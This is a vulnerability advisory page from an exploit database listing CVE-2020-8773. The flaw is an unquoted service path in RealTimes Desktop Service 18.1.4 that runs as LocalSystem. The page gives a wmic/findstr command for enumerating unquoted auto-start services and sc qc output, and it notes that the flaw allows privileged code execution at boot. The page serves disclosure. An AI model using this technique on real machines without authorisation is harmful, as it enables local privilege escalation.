RealTimes Desktop Service 18.1.4 Unquoted Service Path
CVE
Category
Price
Severity
CVE-2020-8773
CWE-428
$5,000
High
Author
Risk
Exploitation Type
Date
shenanigoat
High
Local
2020-11-09
CPE PURL
cpe:cpe:/a:realnetworks:realtimes_desktop_service:18.1.4
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020110059 Below is a copy:
RealTimes Desktop Service 18.1.4 Unquoted Service Path # Exploit Title: RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path
# Discovery by: Erick Galindo
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.real.com/
# Tested Version: 18.1.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7 Enterprise SP1 x64 es
# Step to discover Unquoted Service Path:
c:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr
/i /v "C:\Windows\\" | findstr /i /v "RealTimes" | findstr /i /v """
RealTimes Desktop Service RealTimes Desktop Service c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe Auto
# Service info
sc qc "RealTimes Desktop Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: RealTimes Desktop Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : RealTimes Desktop Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum